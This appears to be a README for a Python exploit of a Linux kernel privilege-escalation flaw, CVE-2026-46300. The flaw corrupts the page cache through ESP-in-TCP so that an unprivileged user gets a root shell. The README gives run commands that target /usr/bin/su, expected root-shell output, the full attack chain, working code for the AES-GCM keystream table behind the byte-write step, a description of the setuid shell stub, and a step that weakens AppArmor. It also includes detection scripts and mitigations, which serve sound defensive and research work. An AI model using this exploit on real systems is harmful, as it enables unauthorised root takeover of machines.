## https://sploitus.com/exploit?id=B5DED594-DA46-566B-B4FE-60D7564C12EF
# Fragnesia (CVE-2026-46300) - Python Exploit

[![Python 3.8+](https://img.shields.io/badge/Python-3.8+-blue.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE) [![Kernel](https://img.shields.io/badge/Kernel-6.1.x--6.12.x-red.svg)](https://www.kernel.org/) [![CVE](https://img.shields.io/badge/CVE-2026--46300-critical.svg)](https://nvd.nist.gov/vuln/detail/CVE-2026-46300)

**Linux Kernel Local Privilege Escalation via ESP-in-TCP Page Cache Corruption**

---

## ⚠️ WARNING – READ BEFORE USE

> **This tool is provided for educational and authorized security testing purposes only.**

> - Unauthorized use of this exploit against systems you do not own or lack explicit permission to test is **illegal and unethical**.
> - The author assumes **no responsibility** for any misuse or damage caused by this software.
> - **Only execute this code in isolated, non‑production environments** (e.g., personal VMs, CTF labs, or systems you own).
> - By using this software, you agree that you are solely responsible for complying with all applicable laws and regulations.

---

## 🔍 Overview

**CVE-2026-46300**, nicknamed **Fragnesia**, is a high‑severity local privilege escalation vulnerability in the Linux kernel. It lets an unprivileged local user gain root **deterministically**: there is no race to win and no timing to tune.

The flaw is in the XFRM (IPsec) subsystem, on the ESP‑in‑TCP receive path. `skb_try_coalesce()` merges an incoming SKB into a previously queued one without propagating the `SKBFL_SHARED_FRAG` flag, so the merged SKB no longer records that its fragments point at pages it does not own. The in‑place AES‑GCM decryption that follows therefore skips the copy it should make and writes straight into those pages, which the attacker has arranged to be page‑cache pages of a file.

Because the attacker also chooses the SA key and the per‑packet IV, the "decrypted" output is fully under their control. The result is an arbitrary byte‑by‑byte write into the page cache of any file the attacker can read and splice(), including setuid binaries such as `/usr/bin/su`.

**Key characteristics:**

- ✅ **Deterministic** – no race condition to win
- ✅ **Reliable** – works on all vulnerable kernel versions
- ✅ **Silent** – modifies only the page cache; the on‑disk file is unchanged and the original bytes return once the pages are evicted or the machine reboots (a plain `sha256sum` of the live file still reads the modified bytes, because it too is served from the page cache)
- ✅ **No root required** – runs as any unprivileged local user that can create a user namespace

---

## 📋 Requirements

| Requirement       | Details |
|-------------------|---------|
| **Linux Kernel**  | Vulnerable versions (see [Vulnerable Kernels](#-vulnerable-kernels)) |
| **Python**        | 3.8 or higher |
| **Kernel Modules**| `esp4`, `esp6`, `xfrm4_tcp`, `xfrm6_tcp` (loaded automatically). ESP‑in‑TCP support is gated by `CONFIG_INET_ESPINTCP` / `CONFIG_INET6_ESPINTCP`, and module names can differ between distributions, so check `lsmod` and `modinfo` on the target |
| **User Namespaces**| Must be enabled (the default on most distributions) |
| **AppArmor**      | Recent Ubuntu releases confine unprivileged user namespaces via AppArmor (enforced by default from 24.04); the exploit needs `sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0` there |
| **Permissions**   | Non‑root user (the exploit escalates privileges) |

---

## 🚀 Installation & Usage

### 1. Clone the Repository

```bash
git clone https://github.com/yourusername/fragnesia-poc.git
cd fragnesia-poc
```

### 2. Run the Exploit

```bash
# Default target: /usr/bin/su
python3 exploit.py

# Optional: specify a custom target binary
python3 exploit.py /path/to/target
```

### Expected Output

```text
[*] Fragnesia (CVE-2026-46300) Exploit
[*] Target: /usr/bin/su
[*] Creating user namespace...
[*] Inside namespace: uid=0, gid=0
[*] Creating network namespace...
[*] Configuring XFRM ESP-in-TCP state...
[*] Building AES-GCM keystream table...
[*] Keystream table built successfully
[*] Writing 192 bytes to page cache...
[+] Payload written to page cache successfully!
[*] Executing target to spawn root shell...
# id
uid=0(root) gid=0(root) groups=0(root)
#
```
### Cleanup (Optional)

The exploit modifies only the page cache. The kernel never marks the corrupted pages dirty, so they are not written back to disk, and dropping them makes the next read fetch the original bytes again:

```bash
echo 1 | sudo tee /proc/sys/vm/drop_caches
```
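`drop_caches` discards only clean pages that nothing is using: if a process exec'd from the modified binary is still running, its mapped pages stay resident until it exits. A quick way to confirm the revert (or, during incident response, to spot a file whose cached copy has been altered) is to compare the page‑cache view of the file with its on‑disk bytes. The added example below is not part of the PoC: a normal `read()` is served from the page cache, while `O_DIRECT` bypasses it, so any differing byte ranges are exactly the footprint this exploit leaves. It assumes Linux and a filesystem that supports `O_DIRECT` reads with 4096‑byte alignment; `evict_file_pages()` is the per‑file alternative to a global `drop_caches`.

```python
"""Added example, not part of the Fragnesia PoC: detect a page-cache copy of a
file that no longer matches the bytes on disk.  Assumes Linux and a filesystem
that supports O_DIRECT reads with 4096-byte alignment."""
import mmap
import os

ALIGN = 4096  # O_DIRECT wants the buffer, offset and length block-aligned


def read_cached(path):
    """Ordinary read(): served from the page cache, i.e. what exec() would see."""
    with open(path, "rb") as f:
        return f.read()


def read_direct(path):
    """Read the same file with O_DIRECT, bypassing the page cache."""
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    try:
        size = os.fstat(fd).st_size
        # Anonymous mmap gives a page-aligned buffer; round the length up to whole pages.
        buf = mmap.mmap(-1, max(ALIGN, -(-size // ALIGN) * ALIGN))
        view, total = memoryview(buf), 0
        while total < size:
            n = os.readv(fd, [view[total:]])  # a short read at EOF ends the loop
            if n == 0:
                break
            total += n
        return bytes(view[:total])
    finally:
        os.close(fd)


def diff_ranges(a, b):
    """Half-open [start, end) ranges where a and b differ; a length mismatch
    counts as a difference over the tail."""
    ranges, start = [], None
    n = max(len(a), len(b))
    for i in range(n):
        same = i < len(a) and i < len(b) and a[i] == b[i]
        if not same and start is None:
            start = i
        elif same and start is not None:
            ranges.append((start, i))
            start = None
    if start is not None:
        ranges.append((start, n))
    return ranges


def evict_file_pages(path):
    """Drop this file's clean cached pages without a system-wide drop_caches.
    Pages still mapped by a running process remain resident."""
    fd = os.open(path, os.O_RDONLY)
    try:
        os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)
    finally:
        os.close(fd)


def check(path):
    """Byte ranges where the cached view and the on-disk view of path disagree."""
    return diff_ranges(read_cached(path), read_direct(path))


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/usr/bin/su"
    diffs = check(target)
    for start, end in diffs:
        print(f"[!] {target}: page cache differs from disk at bytes {start}..{end - 1}")
    if not diffs:
        print(f"[+] {target}: page cache matches disk")
```

Run it as `python3 pagecache_check.py /usr/bin/su` after the exploit and again after cleanup; an empty result means the cached and on‑disk bytes agree.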

## 🔧 How It Works (Technical Deep Dive)

### The Vulnerability: the skb_try_coalesce() Bug

`skb_try_coalesce()` merges a freshly received SKB into the previous one on the receive queue so that the data lives in fewer buffers. Each SKB records in `skb_shinfo(skb)->flags` whether its paged fragments are shared with something outside the network stack (`SKBFL_SHARED_FRAG`, set for example when data is spliced in from the page cache); code that wants to modify such fragments in place must copy them first. The bug is that the merge takes over the fragment references from the source SKB but does not carry `SKBFL_SHARED_FRAG` along, so the merged SKB looks as if it owns pages it merely references.

### XFRM and ESP‑in‑TCP

When a TCP socket is switched to the `espintcp` upper‑layer protocol (`setsockopt(fd, SOL_TCP, TCP_ULP, "espintcp", ...)`), the kernel parses the socket's incoming TCP stream as length‑prefixed ESP packets (RFC 8229) and hands them to XFRM, which decrypts them in place with the SA's AES‑GCM key.

## The Attack Chain

```text
┌──────────────────────────────────────────────────────────────────┐
│ 1. Attacker reads the target file (e.g., /usr/bin/su)            │
│    → its pages enter the page cache                              │
├──────────────────────────────────────────────────────────────────┤
│ 2. Attacker splice()s the file into a TCP socket                 │
│    → SKB frags point at page-cache pages (SKBFL_SHARED_FRAG set) │
├──────────────────────────────────────────────────────────────────┤
│ 3. TCP coalescing merges the SKBs → SKBFL_SHARED_FRAG is LOST    │
├──────────────────────────────────────────────────────────────────┤
│ 4. Socket switches to the espintcp ULP (TCP_ULP)                 │
│    → XFRM now parses the queued data as ESP packets              │
├──────────────────────────────────────────────────────────────────┤
│ 5. XFRM decrypts in place with AES-GCM                           │
│    → skb_cow_data() sees no SKBFL_SHARED_FRAG → no copy-on-write │
├──────────────────────────────────────────────────────────────────┤
│ 6. Decrypted output lands in the target file's page-cache pages  │
│    → attacker-chosen IVs make those bytes arbitrary              │
└──────────────────────────────────────────────────────────────────┘
```

### The Cryptographic Trick (AES‑GCM Keystream Control)

GCM encrypts in counter mode, so decryption is a plain XOR of the ciphertext with a keystream that depends only on the key and the nonce, both of which the attacker chose when configuring the SA. The exploit therefore precomputes a lookup table mapping each byte value (`0x00–0xFF`) to a nonce (IV) whose first keystream byte equals that value; filling all 256 entries is a coupon‑collector search that takes roughly 1,600 AES block encryptions on average and is done once. During decryption:

```text
plaintext = ciphertext XOR keystream
```

To write `desired_byte`:

```text
needed_keystream = current_byte XOR desired_byte
nonce = lookup_table[needed_keystream]
```

The ESP packet is constructed with this nonce, and the kernel's AES‑GCM decryption produces the desired byte.
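The following added example (not the PoC's code) works through the table build and the resulting write in pure Python so the arithmetic can be checked offline. It models only the cryptography: it assumes AES‑128 with the RFC 4106 nonce layout (the SA's 4‑byte salt followed by the 8‑byte per‑packet IV), that the byte to overwrite is the first byte of the decrypted payload, and it leaves the ICV out. The key, salt, sample page bytes and payload bytes are constructed for the illustration.

```python
"""Added example, not the PoC's code: the AES-GCM keystream lookup behind the
byte-write primitive.  Models only the cryptography; assumes AES-128 and the
RFC 4106 nonce layout (4-byte SA salt || 8-byte per-packet IV)."""

def _mul(a, b):
    """Multiply in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = (a << 1) ^ (0x11B if a & 0x80 else 0)
        b >>= 1
    return r

def _make_sbox():
    """AES S-box: multiplicative inverse followed by the affine transform."""
    sbox = [0] * 256
    for x in range(256):
        inv = 0 if x == 0 else next(y for y in range(1, 256) if _mul(x, y) == 1)
        s = inv
        for _ in range(4):  # xor of the inverse with its four left rotations
            inv = ((inv << 1) | (inv >> 7)) & 0xFF
            s ^= inv
        sbox[x] = s ^ 0x63
    return sbox

SBOX = _make_sbox()
MUL2 = [_mul(x, 2) for x in range(256)]
MUL3 = [_mul(x, 3) for x in range(256)]

def aes128_expand_key(key):
    """Eleven 16-byte round keys, laid out column-major like the state."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord + SubWord
            t[0] ^= rcon
            rcon = MUL2[rcon]
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]

def aes128_encrypt_block(rk, block):
    """Textbook AES-128 encryption of one 16-byte block."""
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]
        s = [s[(i + 4 * (i % 4)) % 16] for i in range(16)]  # ShiftRows
        if rnd != 10:  # MixColumns, skipped in the final round
            m = []
            for c in range(0, 16, 4):
                a0, a1, a2, a3 = s[c:c + 4]
                m += [MUL2[a0] ^ MUL3[a1] ^ a2 ^ a3, a0 ^ MUL2[a1] ^ MUL3[a2] ^ a3,
                      a0 ^ a1 ^ MUL2[a2] ^ MUL3[a3], MUL3[a0] ^ a1 ^ a2 ^ MUL2[a3]]
            s = m
        s = [b ^ k for b, k in zip(s, rk[rnd])]
    return bytes(s)

def gcm_first_keystream_byte(rk, salt, iv):
    """GCM reserves counter 1 for the tag, so payload block 0 is E_K(nonce||2)."""
    return aes128_encrypt_block(rk, salt + iv + b"\x00\x00\x00\x02")[0]

def build_keystream_table(rk, salt):
    """Map every byte 0x00..0xFF to an IV whose first keystream byte equals it.
    Coupon-collector search: about 256*H(256), roughly 1570 block encryptions."""
    table, n = {}, 0
    while len(table) < 256:
        iv = n.to_bytes(8, "big")
        table.setdefault(gcm_first_keystream_byte(rk, salt, iv), iv)
        n += 1
    return table

def plan_write(table, current, desired):
    """Decryption yields current ^ keystream, so choose keystream = current ^ desired."""
    return [table[c ^ d] for c, d in zip(current, desired)]

def simulate_inplace_decrypt(rk, salt, page, ivs):
    """Model of the kernel decrypting forged packet i over byte i of the cached page."""
    out = bytearray(page)
    for i, iv in enumerate(ivs):
        out[i] ^= gcm_first_keystream_byte(rk, salt, iv)
    return bytes(out)

# Constructed sample data: an arbitrary SA key and salt, the first bytes of a
# cached ELF header standing in for the target page, and arbitrary payload bytes.
KEY = bytes(range(16))
SALT = b"\xde\xad\xbe\xef"
PAGE_HEAD = b"\x7fELF\x02\x01\x01\x00"
PAYLOAD = b"\x48\x31\xc0\x48\x31\xff\x0f\x05"

def demo():
    """Forge one IV per byte and return what the page reads as afterwards."""
    rk = aes128_expand_key(KEY)
    ivs = plan_write(build_keystream_table(rk, SALT), PAGE_HEAD, PAYLOAD)
    return simulate_inplace_decrypt(rk, SALT, PAGE_HEAD, ivs)
```

`demo()` returns `PAYLOAD`: every byte of the cached page has been replaced by XORing it with a keystream byte the attacker selected through the IV, which is the whole of the write primitive. The table depends on the key and salt, so it must be rebuilt whenever the SA is changed, and only the first byte of each packet's payload is controlled this way, which is why the write is byte‑by‑byte.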

### Payload Injection

The exploit overwrites the first 192 bytes of `/usr/bin/su` with a small ELF stub that:

- Calls `setresuid(0,0,0)` and `setresgid(0,0,0)` to escalate privileges
- Executes `/bin/sh` with root privileges

When a user runs `/usr/bin/su`, the kernel maps the binary from the page cache and so executes the modified bytes; the file on disk is untouched, and the original content returns as soon as those pages are evicted or the machine reboots.

---

## 🎯 Vulnerable Kernels

The bug is fixed in the following kernel package versions. Vendor advisories are authoritative; a fix may also have been backported under a different version string.

| Distribution         | Fixed Version                                              |
|----------------------|------------------------------------------------------------|
| Debian 12 (Bookworm) | 6.1.159-1 or later                                         |
| Debian 11 (Bullseye) | 6.1.159-1~deb11u1 or later                                 |
| Debian Trixie/Sid    | 6.12.32-1 or later                                         |
| Ubuntu 22.04 LTS     | 6.8.0-58-generic or later (check vendor advisories)        |
| RHEL/CentOS 9        | kernel-5.14.0-543.el9 or later (check vendor advisories)   |

All kernels released before May 13, 2026 are considered vulnerable unless the vendor has backported the patch.

### Checking Your Kernel Version

```bash
uname -r
```

### Checking if the Patch is Applied

`SKBFL_SHARED_FRAG` is a compile‑time flag value, not a symbol, so it never appears in `/proc/kallsyms` whether or not the kernel is patched; grepping for it there tells you nothing. Compare the installed kernel package version with the fixed version in your vendor's advisory instead:

```bash
# Debian/Ubuntu: version of the package that provides the running kernel
dpkg-query -W -f='${Version}\n' linux-image-$(uname -r)

# RHEL/CentOS: installed kernel packages
rpm -q kernel
```
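The comparison is easy to get wrong by eye (Debian's `6.1.159-1~deb11u1` sorts *before* `6.1.159-1`, for instance). The added helper below is not part of the PoC: it uses the package manager's own comparison rules where available, falls back to a natural sort otherwise, and also checks whether ESP‑in‑TCP is compiled in at all (`CONFIG_INET_ESPINTCP` / `CONFIG_INET6_ESPINTCP`), since a kernel without it does not expose the path described on this page. The fixed version you pass in and the RPM package naming are assumptions to confirm against your vendor's advisory.

```shell
#!/bin/sh
# Added example, not part of the Fragnesia PoC: exposure check for the running kernel.
# Assumes a dpkg- or rpm-based host; package names and the fixed-version threshold
# are assumptions to confirm against your vendor advisory.

# version_ge A B: succeed if package version A is >= B.
version_ge() {
    if command -v dpkg >/dev/null 2>&1; then
        dpkg --compare-versions "$1" ge "$2"
        return
    fi
    # Fallback: natural sort; does not understand Debian's '~' pre-release marker.
    [ "$(printf '%s\n' "$1" "$2" | sort -V | tail -n 1)" = "$1" ]
}

# espintcp_in_config FILE: succeed if the kernel config enables ESP-in-TCP (v4 or v6).
espintcp_in_config() {
    grep -Eq '^CONFIG_INET6?_ESPINTCP=y' "$1"
}

# running_kernel_pkg_version: package version of the kernel currently booted.
running_kernel_pkg_version() {
    if command -v dpkg-query >/dev/null 2>&1; then
        dpkg-query -W -f='${Version}' "linux-image-$(uname -r)" 2>/dev/null
    elif command -v rpm >/dev/null 2>&1; then
        # Assumption: RHEL-style kernel-core-<uname -r> package naming.
        rpm -q --qf '%{VERSION}-%{RELEASE}' "kernel-core-$(uname -r)" 2>/dev/null
    fi
}

# check_fixed INSTALLED FIXED: print a verdict; succeed only if INSTALLED >= FIXED.
check_fixed() {
    if version_ge "$1" "$2"; then
        echo "kernel package $1 >= $2: fix present according to the advisory"
        return 0
    fi
    echo "kernel package $1 < $2: VULNERABLE unless the fix was backported"
    return 1
}

# Usage: FIXED=6.1.159-1 sh check_kernel.sh
if [ -n "$FIXED" ]; then
    cfg="/boot/config-$(uname -r)"
    if [ -r "$cfg" ] && ! espintcp_in_config "$cfg"; then
        echo "ESP-in-TCP is not compiled into this kernel; the described path is not reachable"
    fi
    installed="$(running_kernel_pkg_version)"
    [ -n "$installed" ] || { echo "could not determine the kernel package version"; exit 2; }
    check_fixed "$installed" "$FIXED"
fi
```

Run it as `FIXED=6.1.159-1 sh check_kernel.sh` with the fixed version from the table for your distribution; the exit status is 0 only when the installed package is at or above that version.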

---

## 🛡️ Mitigation

### Apply the Kernel Update (Recommended)

```bash
# Debian/Ubuntu: the fixed kernel ships as a new versioned package pulled in by the
# metapackage (linux-image-amd64 on Debian, linux-image-generic on Ubuntu);
# upgrading only linux-image-$(uname -r) would not install it
sudo apt update && sudo apt full-upgrade

# RHEL/CentOS/Fedora
sudo dnf update kernel

# The running kernel only changes after a reboot
sudo reboot
```

### Disable ESP‑in‑TCP (Temporary Workaround)

If you cannot update immediately, unload the ESP modules. This disables IPsec ESP entirely, not just ESP‑in‑TCP, and `rmmod` fails for modules that are in use or built into the kernel:

```bash
sudo rmmod esp4 esp6 xfrm4_tcp xfrm6_tcp
```

Prevent them from loading on boot (an `install … /bin/false` line also defeats explicit `modprobe` requests and autoloading, which a plain `blacklist` entry does not):

```bash
echo 'install esp4 /bin/false' | sudo tee /etc/modprobe.d/fragnesia.conf
echo 'install esp6 /bin/false' | sudo tee -a /etc/modprobe.d/fragnesia.conf
echo 'install xfrm4_tcp /bin/false' | sudo tee -a /etc/modprobe.d/fragnesia.conf
echo 'install xfrm6_tcp /bin/false' | sudo tee -a /etc/modprobe.d/fragnesia.conf
```

### Restrict User Namespaces

The exploit needs an unprivileged user namespace to become root inside its own network namespace and configure XFRM there. Setting the limit to zero refuses every new user namespace (this is not persistent; add `user.max_user_namespaces = 0` to a file in `/etc/sysctl.d/` to keep it across reboots):

```bash
# Restrict unprivileged user namespaces
echo 0 | sudo tee /proc/sys/user/max_user_namespaces
```

> **Note:** This blocks all new user namespaces, including ones created by root, and will break container runtimes (Docker, Podman, rootless builds) and sandboxes that rely on them. On Ubuntu, `kernel.apparmor_restrict_unprivileged_userns=1` (the 24.04 default) is a less disruptive alternative, since it keeps namespaces available to programs with an AppArmor profile.

---

## 📚 References

- **CVE Database:** NIST CVE‑2026‑46300
- **Kernel Patch:** netdev mailing list
- **Original PoC (C):** v12‑security/pocs
- **Technical Analysis:** Maxime288/Fragnesia‑CVE‑2026‑46300
- **LWN Article:** Fragnesia: bypassing page cache protection
- **Linux Kernel Documentation:** XFRM subsystem

---

## 📄 License

This project is licensed under the **MIT License** – see the `LICENSE` file for details.

---

## 🙏 Acknowledgements

- William Bowling and the V12 team for discovering the vulnerability
- Linux kernel maintainers for promptly fixing the issue
- The open‑source security community for analysis and disclosure coordination

---

## ⚠️ Final Disclaimer

THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED. THE AUTHORS AND CONTRIBUTORS ARE NOT RESPONSIBLE FOR ANY DAMAGE OR LOSS CAUSED BY USING THIS TOOL. USE AT YOUR OWN RISK AND ONLY ON SYSTEMS YOU HAVE PERMISSION TO TEST.

---

## 📬 Contact

For questions, issues, or suggestions, please open an issue on GitHub.